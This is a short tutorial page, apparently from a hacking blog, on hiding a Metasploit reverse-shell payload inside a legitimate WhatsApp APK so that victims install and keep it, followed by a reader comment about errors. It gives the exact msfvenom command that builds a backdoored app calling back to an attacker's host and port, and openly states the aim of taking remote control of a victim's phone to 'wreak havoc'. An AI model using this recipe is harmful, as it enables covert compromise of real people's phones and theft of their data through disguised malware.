Video Tutorials

How to Embed a Metasploit Payload in an Original .Apk File

[sc name=”ad_1″]

Hey Guys, In this video i show you how to Embed a Metasploit Payload in an Original .Apk File.

Normally we have to install the payload in the victims phone by any means we can, and when the victim runs the application, we would get a direct connection to our victim’s phone remotely and we can use it to wreak havoc on that phone.

But since the app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.

Requirements:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1 apktool

msfvenom -x WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 -o WhatsApp-backdoored.apk

[sc name=”ad-in-article”]

Video:

https://youtu.be/_UZlgN28SxY

About the author

Mazen Elzanaty

3 Comments

Click here to post a comment

  • Hey ,
    I’m getting error.
    When I tired to run first command
    E:Unable to locate package lib32ncurses5
    For the second command
    Error: invalid payload : andriod/meterpreter/reverse_tcp

    I have tired for the all payloads andriod/meterpreter/reverse_http so.but I ‘m getting the same.please help me to solve this.